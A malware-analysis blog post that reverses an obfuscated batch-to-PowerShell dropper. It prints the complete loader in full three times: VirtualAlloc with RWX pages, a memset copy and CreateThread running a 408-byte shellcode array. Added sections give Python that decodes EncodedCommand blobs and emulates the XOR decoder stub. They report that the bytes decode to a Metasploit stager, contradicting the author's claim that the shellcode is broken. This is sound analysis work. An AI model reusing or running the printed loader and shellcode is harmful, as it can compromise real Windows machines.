Powershell 2 Shellcode Part I

 

The hunt:

I do my searches on VirusTotal for this blog. After a quick search I managed to find a cute sample to play with. The file is a piece of Windows Batch script; you can view its contents down below:

::[Bat To Exe Converter]
::
::YAwzoRdxOk+EWAnk
::fBw5plQjdG8=
::YAwzuBVtJxjWCl3EqQJgSA==
::ZR4luwNxJguZRRnk
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSDk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSDk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpCI=
::egkzugNsPRvcWATEpCI=
::dAsiuh18IRvcCxnZtBJQ
::cRYluBh/LU+EWAnk
::YxY4rhs+aU+JeA==
::cxY6rQJ7JhzQF1fEqQJQ
::ZQ05rAF9IBncCkqN+0xwdVs0
::ZQ05rAF9IAHYFVzEqQJQ
::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=
::fBEirQZwNQPfEVWB+kM9LVsJDGQ=
::cRolqwZ3JBvQF1fEqQJQ
::dhA7uBVwLU+EWDk=
::YQ03rBFzNR3SWATElA==
::dhAmsQZ3MwfNWATElA==
::ZQ0/vhVqMQ3MEVWAtB9wSA==
::Zg8zqx1/OA3MEVWAtB9wSA==
::dhA7pRFwIByZRRnk
::Zh4grVQjdDWDJEuL+1YMDB5HRxCNLFeeE5cV+/zT7ueKowxTUfo6GA==
::YB416Ek+ZG8=
::
::
::978f952a14a936cc963da21a135fa983
powershell -w 1 -C "sv LjP -;
sv RG ec;
sv eVG ((gv LjP).value.toString()+(gv RG).value.toString());
powershell (gv eVG).value.toString() '$smCU = '$iKF = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $iKF -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z =
0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0xba,0x10,0x90,0x17,0x0b,0x2b,0xc9,0xb1,0x60,0x31,0x50,0x18,0x83,
0xe8,0xfc,0x03,0x50,0x04,0x72,0xe2,0xf7,0xcc,0xf0,0x0d,0x08,0x0c,0x95,0x84,0xed,0x3d,0x95,0xf3,0x66,
0x6d,0x25,0x77,0x2a,0x81,0xce,0xd5,0xdf,0x12,0xa2,0xf1,0xd0,0x93,0x09,0x24,0xde,0x24,0x21,0x14,0x41,
0xa6,0x38,0x49,0xa1,0x97,0xf2,0x9c,0xa0,0xd0,0xef,0x6d,0xf0,0x89,0x64,0xc3,0xe5,0xbe,0x31,0xd8,0x8e,
0x8c,0xd4,0x58,0x72,0x44,0xd6,0x49,0x25,0xdf,0x81,0x49,0xc7,0x0c,0xba,0xc3,0xdf,0x51,0x87,0x9a,0x54,
0xa1,0x73,0x1d,0xbd,0xf8,0x7c,0xb2,0x80,0x35,0x8f,0xca,0xc5,0xf1,0x70,0xb9,0x3f,0x02,0x0c,0xba,0xfb,
0x79,0xca,0x4f,0x18,0xd9,0x99,0xe8,0xc4,0xd8,0x4e,0x6e,0x8e,0xd6,0x3b,0xe4,0xc8,0xfa,0xba,0x29,0x63,
0x06,0x36,0xcc,0xa4,0x8f,0x0c,0xeb,0x60,0xd4,0xd7,0x92,0x31,0xb0,0xb6,0xab,0x22,0x1b,0x66,0x0e,0x28,
0xb1,0x73,0x23,0x73,0xdd,0xed,0x59,0xf8,0x1d,0x9a,0xd6,0x69,0x73,0x33,0x4d,0x02,0xc7,0xb4,0x4b,0xd5,
0x28,0xef,0xa5,0x02,0x85,0x43,0x95,0xe7,0x7a,0x0c,0x23,0x5e,0x05,0x6b,0xac,0x8b,0xa6,0x20,0x39,0x37,
0x1b,0x94,0xd5,0x8c,0x9a,0x1a,0x26,0x1b,0x2c,0x1a,0x26,0xdb,0x63,0x29,0x76,0x99,0x1e,0x39,0x4e,0x6d,
0xb9,0xaa,0xe3,0xc8,0x76,0x44,0xad,0xff,0xc1,0xc0,0x2c,0x48,0xe2,0x9e,0xff,0x0a,0x48,0x39,0x67,0xbb,
0x31,0xa4,0x67,0xeb,0xd9,0x71,0xe1,0x94,0xdf,0x81,0x24,0x23,0x19,0x2e,0xaf,0x34,0x97,0x31,0xab,0x66,
0x84,0xe2,0xe3,0xdb,0x7c,0x6d,0xe7,0x89,0xae,0x56,0x08,0xe4,0x38,0xc2,0xfc,0x58,0x2c,0x93,0x32,0x67,
0xac,0x1a,0xd4,0x0d,0xa8,0x4c,0x7f,0xcd,0xe6,0x04,0x0a,0xb7,0x98,0x53,0x0b,0xe2,0xf7,0x08,0xa7,0x5e,
0xa1,0xc6,0x6a,0x67,0x55,0x6c,0x8a,0xb2,0xe0,0x52,0x01,0x2b,0x82,0xda,0xf9,0x53,0x52,0xb3,0xb9,0xa3,
0x67,0xa3,0xbd,0x91,0xc8,0x56,0x8f,0x72,0x26,0x2d,0xad,0xd5,0x39,0x9b,0xd8,0x99,0xad,0x24,0x0d,0x1a,
0x2d,0x4d,0x2d,0x1a,0x6d,0x8d,0x7e,0x72,0x35,0x29,0xd3,0x67,0x3a,0xe4,0x47,0x34,0x97,0x8e,0x8f,0xec,
0x7f,0x91,0x6f,0x13,0x7f,0xc2,0x39,0x7b,0x6d,0x72,0x4c,0x99,0x6e,0xaf,0xca,0x9e,0xe4,0x9d,0x5e,0x19,
0x05,0xdd,0xe4,0xe6,0x70,0x04,0xbe,0x25,0x25,0x2e,0x56,0x55,0x26,0x51,0x9a,0x98,0xf6,0x9d,0xe8,0xf4,
0x37,0xd5,0x27,0x27,0x06,0x21,0x7d,0x37;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($YBpC.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$YBpC,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($smCU));$HeLs = "-ec ";if([IntPtr]::Size -eq 8){$WzJ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $WzJ $HeLs $e"}else{;iex "& powershell $HeLs $e";}'"

Reverse it

Scrolling past the Bat To Exe Converter header, the only real command in the file is a powershell invocation: `-w 1` is `-WindowStyle Hidden` and `-C` is `-Command`, so the script starts a hidden PowerShell process with a very long command line attached to it.

The script carries one big embedded string, a base64-encoded blob, and hands it to a second powershell process. What is missing is the switch that says so: `sv LjP -` and `sv RG ec` stash `-` and `ec` in two variables and `sv eVG` glues them into `-ec` (the short form of `-EncodedCommand`), so a string search for `-EncodedCommand` or `-ec` over the batch file finds nothing, while the child process still receives a perfectly ordinary `-ec <base64>` command line.

Let’s open our good friend CyberChef to decode the blob. In the operations pane on the left pick “From Base64” and then “Decode text”, set the encoding of the latter to UTF-16LE (PowerShell’s -EncodedCommand takes the script as UTF-16LE before base64, which is why a plain base64 decode shows every character followed by a NUL), paste the string into the input pane and bake:

$smCU = '$iKF = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $iKF -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0xba,0x10,0x90,0x17,0x0b,0x2b,0xc9,0xb1,0x60,0x31,0x50,0x18,0x83,0xe8,0xfc,0x03,0x50,0x04,0x72,0xe2,0xf7,0xcc,0xf0,0x0d,0x08,0x0c,0x95,0x84,0xed,0x3d,0x95,0xf3,0x66,0x6d,0x25,0x77,0x2a,0x81,0xce,0xd5,0xdf,0x12,0xa2,0xf1,0xd0,0x93,0x09,0x24,0xde,0x24,0x21,0x14,0x41,0xa6,0x38,0x49,0xa1,0x97,0xf2,0x9c,0xa0,0xd0,0xef,0x6d,0xf0,0x89,0x64,0xc3,0xe5,0xbe,0x31,0xd8,0x8e,0x8c,0xd4,0x58,0x72,0x44,0xd6,0x49,0x25,0xdf,0x81,0x49,0xc7,0x0c,0xba,0xc3,0xdf,0x51,0x87,0x9a,0x54,0xa1,0x73,0x1d,0xbd,0xf8,0x7c,0xb2,0x80,0x35,0x8f,0xca,0xc5,0xf1,0x70,0xb9,0x3f,0x02,0x0c,0xba,0xfb,0x79,0xca,0x4f,0x18,0xd9,0x99,0xe8,0xc4,0xd8,0x4e,0x6e,0x8e,0xd6,0x3b,0xe4,0xc8,0xfa,0xba,0x29,0x63,0x06,0x36,0xcc,0xa4,0x8f,0x0c,0xeb,0x60,0xd4,0xd7,0x92,0x31,0xb0,0xb6,0xab,0x22,0x1b,0x66,0x0e,0x28,0xb1,0x73,0x23,0x73,0xdd,0xed,0x59,0xf8,0x1d,0x9a,0xd6,0x69,0x73,0x33,0x4d,0x02,0xc7,0xb4,0x4b,0xd5,0x28,0xef,0xa5,0x02,0x85,0x43,0x95,0xe7,0x7a,0x0c,0x23,0x5e,0x05,0x6b,0xac,0x8b,0xa6,0x20,0x39,0x37,0x1b,0x94,0xd5,0x8c,0x9a,0x1a,0x26,0x1b,0x2c,0x1a,0x26,0xdb,0x63,0x29,0x76,0x99,0x1e,0x39,0x4e,0x6d,0xb9,0xaa,0xe3,0xc8,0x76,0x44,0xad,0xff,0xc1,0xc0,0x2c,0x48,0xe2,0x9e,0xff,0x0a,0x48,0x39,0x67,0xbb,0x31,0xa4,0x67,0xeb,0xd9,0x71,0xe1,0x94,0xdf,0x81,0x24,0x23,0x19,0x2e,0xaf,0x34,0x97,0x31,0xab,0x66,0x84,0xe2,0xe3,0xdb,0x7c,0x6d,0xe7,0x89,0xae,0x56,0x08,0xe4,0x38,0xc2,0xfc,0x58,0x2c,0x93,0x32,0x67,0xac,0x1a,0xd4,0x0d,0xa8,0x4c,0x7f,0xcd,
0xe6,0x04,0x0a,0xb7,0x98,0x53,0x0b,0xe2,0xf7,0x08,0xa7,0x5e,0xa1,0xc6,0x6a,0x67,0x55,0x6c,0x8a,0xb2,0xe0,0x52,0x01,0x2b,0x82,0xda,0xf9,0x53,0x52,0xb3,0xb9,0xa3,0x67,0xa3,0xbd,0x91,0xc8,0x56,0x8f,0x72,0x26,0x2d,0xad,0xd5,0x39,0x9b,0xd8,0x99,0xad,0x24,0x0d,0x1a,0x2d,0x4d,0x2d,0x1a,0x6d,0x8d,0x7e,0x72,0x35,0x29,0xd3,0x67,0x3a,0xe4,0x47,0x34,0x97,0x8e,0x8f,0xec,0x7f,0x91,0x6f,0x13,0x7f,0xc2,0x39,0x7b,0x6d,0x72,0x4c,0x99,0x6e,0xaf,0xca,0x9e,0xe4,0x9d,0x5e,0x19,0x05,0xdd,0xe4,0xe6,0x70,0x04,0xbe,0x25,0x25,0x2e,0x56,0x55,0x26,0x51,0x9a,0x98,0xf6,0x9d,0xe8,0xf4,0x37,0xd5,0x27,0x27,0x06,0x21,0x7d,0x37;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($YBpC.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$YBpC,0,0,0);for (;;){Start-sleep 60};';
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($smCU));
$HeLs = "-ec ";
if([IntPtr]::Size -eq 8) {
	$WzJ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";
	iex "& $WzJ $HeLs $e"
}
else {
iex "& powershell $HeLs $e";
}

After a bit of formatting, we can start reading the second layer of the packed code.

Again we see a large variable with a pretty big string in it; this time the string is clear text rather than base64. Below it sits an if/else on `[IntPtr]::Size -eq 8`, and each branch ends in an “IEX” of a new powershell command line. Both branches re-encode the string (`Unicode.GetBytes` followed by `ToBase64String`, the exact inverse of what we just did in CyberChef) and pass it with `-ec`; the only difference is that in a 64-bit PowerShell the child is explicitly the 32-bit binary under `%SystemRoot%\syswow64\WindowsPowerShell\v1.0\`. That is the first hint that whatever comes next only works in a 32-bit process.

“IEX” is the built-in alias of the `Invoke-Expression` cmdlet: it takes a string and runs it as PowerShell code, much like `eval` in languages such as JavaScript. Here the string is `& <powershell path> -ec <base64>`, so the effect is to spawn the child process.
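The two conversions just discussed, the CyberChef decode and the `Unicode.GetBytes` + `ToBase64String` re-encode, as an added Python example (my code, not the sample's or the post's). It also pulls the encoded argument out of a command line the way a triage script would, accepting the short switch forms powershell.exe itself accepts. It works on the resolved command line a child process receives, not on the batch file, where the switch only exists as `-` and `ec` in two variables:

```python
"""Decode and re-create PowerShell -EncodedCommand payloads (added example, not code from the post)."""
import base64
import re
from typing import Optional


def encode_powershell_command(script: str) -> str:
    """What the second layer does with
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($smCU)).
    .NET 'Unicode' is UTF-16LE, so that is also the encoding to use on the way back."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64: str) -> str:
    """The CyberChef recipe in one call: From Base64, then Decode text as UTF-16LE.
    Whitespace is stripped first so a blob copied out of a wrapped log line still decodes."""
    raw = base64.b64decode("".join(b64.split()))
    return raw.decode("utf-16-le")


# A switch starting with -e or /e, followed by a base64-looking argument.
_SWITCH = re.compile(r"(?<![\w-])[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{4,})", re.IGNORECASE)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 blob behind -EncodedCommand in a resolved command line.

    powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand, so the
    switch name is validated against that rule instead of a fixed list. Run this on the
    command line the child process actually gets (process-creation telemetry): nothing
    here evaluates the '-' + 'ec' trick of the parent script.
    """
    for m in _SWITCH.finditer(cmdline):
        switch = m.group(1).lower()
        if switch == "ec" or "encodedcommand".startswith(switch):
            return m.group(2)
    return None


def decode_cmdline(cmdline: str) -> Optional[str]:
    """Find the encoded argument and decode it; None when the command line has none."""
    blob = extract_encoded_command(cmdline)
    return decode_powershell_command(blob) if blob else None


if __name__ == "__main__":
    # Constructed sample: a short stage wrapped the same way the second layer wraps $smCU.
    stage = '$w = Add-Type -memberDefinition $iKF -Name "Win32" -namespace Win32Functions -passthru'
    cmd = "powershell -w 1 -ec " + encode_powershell_command(stage)
    print(cmd)
    print(decode_cmdline(cmd))
```

Decoding the bytes as ASCII or UTF-8 instead of UTF-16LE is what produces the "every other character is a NUL" look. The extractor is meant for process-creation logs, where the child's command line contains a literal `-ec`, not for the parent's obfuscated script.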

Now we understand the goal of this second layer: it takes a piece of PowerShell code, stores it in a variable, re-encodes it and launches a 32-bit PowerShell to execute it. Let’s focus our attention on the script inside that variable:

$iKF = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$w = Add-Type -memberDefinition $iKF -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0xba,0x10,0x90,0x17,0x0b,0x2b,0xc9,0xb1,0x60,0x31,0x50,0x18,0x83,
    0xe8,0xfc,0x03,0x50,0x04,0x72,0xe2,0xf7,0xcc,0xf0,0x0d,0x08,0x0c,0x95,0x84,0xed,0x3d,0x95,0xf3,0x66,
    0x6d,0x25,0x77,0x2a,0x81,0xce,0xd5,0xdf,0x12,0xa2,0xf1,0xd0,0x93,0x09,0x24,0xde,0x24,0x21,0x14,0x41,
    0xa6,0x38,0x49,0xa1,0x97,0xf2,0x9c,0xa0,0xd0,0xef,0x6d,0xf0,0x89,0x64,0xc3,0xe5,0xbe,0x31,0xd8,0x8e,
    0x8c,0xd4,0x58,0x72,0x44,0xd6,0x49,0x25,0xdf,0x81,0x49,0xc7,0x0c,0xba,0xc3,0xdf,0x51,0x87,0x9a,0x54,
    0xa1,0x73,0x1d,0xbd,0xf8,0x7c,0xb2,0x80,0x35,0x8f,0xca,0xc5,0xf1,0x70,0xb9,0x3f,0x02,0x0c,0xba,0xfb,
    0x79,0xca,0x4f,0x18,0xd9,0x99,0xe8,0xc4,0xd8,0x4e,0x6e,0x8e,0xd6,0x3b,0xe4,0xc8,0xfa,0xba,0x29,0x63,
    0x06,0x36,0xcc,0xa4,0x8f,0x0c,0xeb,0x60,0xd4,0xd7,0x92,0x31,0xb0,0xb6,0xab,0x22,0x1b,0x66,0x0e,0x28,
    0xb1,0x73,0x23,0x73,0xdd,0xed,0x59,0xf8,0x1d,0x9a,0xd6,0x69,0x73,0x33,0x4d,0x02,0xc7,0xb4,0x4b,0xd5,
    0x28,0xef,0xa5,0x02,0x85,0x43,0x95,0xe7,0x7a,0x0c,0x23,0x5e,0x05,0x6b,0xac,0x8b,0xa6,0x20,0x39,0x37,
    0x1b,0x94,0xd5,0x8c,0x9a,0x1a,0x26,0x1b,0x2c,0x1a,0x26,0xdb,0x63,0x29,0x76,0x99,0x1e,0x39,0x4e,0x6d,
    0xb9,0xaa,0xe3,0xc8,0x76,0x44,0xad,0xff,0xc1,0xc0,0x2c,0x48,0xe2,0x9e,0xff,0x0a,0x48,0x39,0x67,0xbb,
    0x31,0xa4,0x67,0xeb,0xd9,0x71,0xe1,0x94,0xdf,0x81,0x24,0x23,0x19,0x2e,0xaf,0x34,0x97,0x31,0xab,0x66,
    0x84,0xe2,0xe3,0xdb,0x7c,0x6d,0xe7,0x89,0xae,0x56,0x08,0xe4,0x38,0xc2,0xfc,0x58,0x2c,0x93,0x32,0x67,
    0xac,0x1a,0xd4,0x0d,0xa8,0x4c,0x7f,0xcd,0xe6,0x04,0x0a,0xb7,0x98,0x53,0x0b,0xe2,0xf7,0x08,0xa7,0x5e,
    0xa1,0xc6,0x6a,0x67,0x55,0x6c,0x8a,0xb2,0xe0,0x52,0x01,0x2b,0x82,0xda,0xf9,0x53,0x52,0xb3,0xb9,0xa3,
    0x67,0xa3,0xbd,0x91,0xc8,0x56,0x8f,0x72,0x26,0x2d,0xad,0xd5,0x39,0x9b,0xd8,0x99,0xad,0x24,0x0d,0x1a,
    0x2d,0x4d,0x2d,0x1a,0x6d,0x8d,0x7e,0x72,0x35,0x29,0xd3,0x67,0x3a,0xe4,0x47,0x34,0x97,0x8e,0x8f,0xec,
    0x7f,0x91,0x6f,0x13,0x7f,0xc2,0x39,0x7b,0x6d,0x72,0x4c,0x99,0x6e,0xaf,0xca,0x9e,0xe4,0x9d,0x5e,0x19,
    0x05,0xdd,0xe4,0xe6,0x70,0x04,0xbe,0x25,0x25,0x2e,0x56,0x55,0x26,0x51,0x9a,0x98,0xf6,0x9d,0xe8,0xf4,
    0x37,0xd5,0x27,0x27,0x06,0x21,0x7d,0x37;
$g = 0x1000;
if ($z.Length -gt 0x1000){
    $g = $z.Length
};
$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);
for ($i=0;$i -le ($z.Length-1);$i++) {
    $w::memset([IntPtr]($YBpC.ToInt32()+$i), $z[$i], 1)
};
$w::CreateThread(0,0,$YBpC,0,0,0);
for (;;){
    Start-sleep 60
};

Now we can see the three functions imported through P/Invoke: VirtualAlloc and CreateThread from “kernel32.dll” and memset from “msvcrt.dll”. We’ll focus our attention on “kernel32.dll” because later in the code we see calls to a couple of its functions. A side effect worth knowing for detection: `Add-Type -memberDefinition` compiles that C# on the fly, so Windows PowerShell spawns csc.exe and writes a temporary .cs/.dll pair under %TEMP% before any shellcode runs.

Kernel32.dll exports the routines user-mode code uses to talk to the Windows OS: allocating memory, creating processes and threads, working with files, and so on.

Right after the Add-Type call, a byte array is stored in the “$z” variable. Interesting; let’s keep reading. A few lines down we see a call to the “VirtualAlloc” routine from kernel32. Looking up the prototype on MSDN tells us that it reserves or commits a region of pages in the virtual address space of the calling process:

LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);

The second argument is the size of the buffer (0x1000 bytes, one page) and the last one is the page protection. The value 0x40 stands for PAGE_EXECUTE_READWRITE, which makes the pages readable, writable and executable at the same time; normal code rarely needs RWX memory, which is why this flag is a staple of injection detections. Note the third argument: `$g` lands in flAllocationType. It holds 0x1000, which happens to be MEM_COMMIT, so the call works, but the `if ($z.Length -gt 0x1000){$g = $z.Length}` guard in front of it would replace the allocation type with the array length while dwSize stays hard-coded at 0x1000. This quirk comes straight from msfvenom’s PowerShell output template and is harmless for an array as small as this one.

$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);

Another few lines down we see calls to “memset” and “CreateThread”. The memset loop copies the byte array into the newly allocated buffer one byte at a time (note the `ToInt32()` on the pointer: this loader only works in a 32-bit process, which is why the previous layer relaunched the syswow64 PowerShell on 64-bit hosts). CreateThread then starts a thread inside the current process (PowerShell) with the buffer address as its start routine, i.e. classic self-injection, and the `for (;;){Start-Sleep 60}` loop keeps the process, and with it the thread, alive.

Bad end

It looks like we found shellcode that should be executed in the context of the PowerShell process, but after further inspection the bytes do not disassemble into legitimate x86 instructions. Noob mistake: I should have checked the opcodes before writing this.
Because of the bad ending, in the next post I will continue with a working piece of malware that has good shellcode: 009a2c4a8d4b77935d8435dc091e2efebfacabe4cc80bf7c4ff185c4d8b7fd37
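The opcode check the post says it skipped, done here as an added example that is not part of the original write-up (the code is mine; the byte values are the post's `$z` array). A disassembler does produce nonsense after the first 24 bytes, but the reason is that those 24 bytes are a decoder rather than payload: an fnstenv-based GetPC, a 32-bit key in edx, a counter of 0x60 dwords and a rolling XOR that starts at offset 0x18, which is the layout of Metasploit's shikata_ga_nai encoder. The loop even patches its own displacement and `loop` bytes on its first pass, so the static bytes at offsets 24..26 never execute as listed, and 0x18 + 0x60 * 4 = 408 is exactly the array's length. Emulating the loop shows what the thread would actually run:

```python
"""Recognise and emulate the XOR decoder stub in front of the post's shellcode (added example, not from the post)."""
import struct
from typing import Dict, Optional, Tuple

# The 408 bytes of the post's $z array, copied verbatim from the decoded stage.
SHELLCODE = bytes.fromhex(
    "d9c9d97424f458ba1090170b2bc9b16031501883"
    "e8fc03500472e2f7ccf00d080c9584ed3d95f366"
    "6d25772a81ced5df12a2f1d0930924de24211441"
    "a63849a197f29ca0d0ef6df08964c3e5be31d88e"
    "8cd4587244d64925df8149c70cbac3df51879a54"
    "a1731dbdf87cb280358fcac5f170b93f020cbafb"
    "79ca4f18d999e8c4d84e6e8ed63be4c8faba2963"
    "0636cca48f0ceb60d4d79231b0b6ab221b660e28"
    "b1732373dded59f81d9ad66973334d02c7b44bd5"
    "28efa502854395e77a0c235e056bac8ba6203937"
    "1b94d58c9a1a261b2c1a26db632976991e394e6d"
    "b9aae3c87644adffc1c02c48e29eff0a483967bb"
    "31a467ebd971e194df812423192eaf349731ab66"
    "84e2e3db7c6de789ae5608e438c2fc582c933267"
    "ac1ad40da84c7fcde6040ab798530be2f708a75e"
    "a1c66a67556c8ab2e052012b82daf95352b3b9a3"
    "67a3bd91c8568f72262dadd5399bd899ad240d1a"
    "2d4d2d1a6d8d7e723529d3673ae44734978e8fec"
    "7f916f137fc2397b6d724c996eafca9ee49d5e19"
    "05dde4e67004be25252e565526519a98f69de8f4"
    "37d5272706217d37"
)

FNSTENV = b"\xd9\x74\x24\xf4"  # fnstenv [esp-0xc]: after it, [esp] holds the address of the last FPU instruction


def find_xor_decoder(sc: bytes) -> Optional[Dict[str, int]]:
    """Match the decoder layout seen in this sample and return its parameters.

    offset  bytes            instruction
      0     d9 c9            fxch st(1)           any FPU instruction; fnstenv records its address
      2     d9 74 24 f4      fnstenv [esp-0xc]    GetPC trick: the saved FPU IP lands at [esp]
      6     58               pop eax              eax = address of offset 0
      7     ba 10 90 17 0b   mov edx, 0x0b179010  initial XOR key
     12     2b c9            sub ecx, ecx
     14     b1 60            mov cl, 0x60         number of dwords to decode
     16     31 50 18         xor [eax+0x18], edx  decode one dword
     19     83 e8 fc         sub eax, -4          advance
     22     03 50 04         add edx, [eax+0x04]  feed the decoded dword back into the key
     25     72 e2 ..         (reads as jb)        inside the XORed region: the first xor patches
                                                  the add's disp8 (0x04 -> 0x14) and turns 72 e2
                                                  into e2 f5 = loop back to the xor at offset 16
    Metasploit shuffles the order of these instructions between runs; this matcher is
    tuned to the ordering in this sample and returns None for anything else.
    """
    if len(sc) < 27 or not (0xD8 <= sc[0] <= 0xDF) or sc[2:6] != FNSTENV:
        return None
    if not (0x58 <= sc[6] <= 0x5F):
        return None
    reg = sc[6] - 0x58                                 # register that received the GetPC value
    if sc[7] != 0xBA or sc[12:14] != b"\x2b\xc9" or sc[14] != 0xB1 or sc[16] != 0x31:
        return None
    modrm = sc[17]                                     # xor [reg+disp8], edx: mod=01, reg=edx(2), rm=reg
    if (modrm >> 6) != 1 or ((modrm >> 3) & 7) != 2 or (modrm & 7) != reg:
        return None
    if sc[19] != 0x83 or sc[20] != (0xE8 | reg) or sc[21] != 0xFC:   # sub reg, -4
        return None
    return {"key": struct.unpack_from("<I", sc, 8)[0], "count": sc[15], "offset": sc[18]}


def emulate_decoder(sc: bytes, key: int, count: int, offset: int) -> bytes:
    """Run the loop the stub would run: dword ^= key; key += decoded dword (mod 2^32)."""
    if offset + 4 * count > len(sc):
        raise ValueError("decoder parameters run past the end of the buffer")
    buf = bytearray(sc)
    for pos in range(offset, offset + 4 * count, 4):
        plain = struct.unpack_from("<I", buf, pos)[0] ^ key
        struct.pack_into("<I", buf, pos, plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(buf)


def decoded_payload(sc: bytes) -> Optional[Tuple[Dict[str, int], bytes]]:
    """(decoder parameters, decoded payload) or None when no stub is recognised.

    The first three decoded bytes are the patched disp8 and the loop instruction, i.e.
    still part of the decoder; the payload proper starts right after them.
    """
    info = find_xor_decoder(sc)
    if info is None:
        return None
    out = emulate_decoder(sc, info["key"], info["count"], info["offset"])
    return info, out[info["offset"] + 3:]


if __name__ == "__main__":
    info, payload = decoded_payload(SHELLCODE)
    print(info, len(payload), payload[:17].hex())
```

On the post's bytes this reports key 0x0b179010, 96 dwords from offset 0x18 and a 381-byte payload that begins `fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52`: `cld; call +0x82; pushad; mov ebp, esp; xor eax, eax; mov edx, fs:[eax+0x30]`, the start of the PEB walk that opens every Metasploit x86 Windows stager. The matcher is deliberately strict; other samples will need the offsets adjusted to the instruction order the encoder picked for them.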

C ya soon.

SHA256:

  • 3c1c70ec676bc8c10a2767a3089f83103386fdd38592cfa4b5d6444a3b7ef93c

 
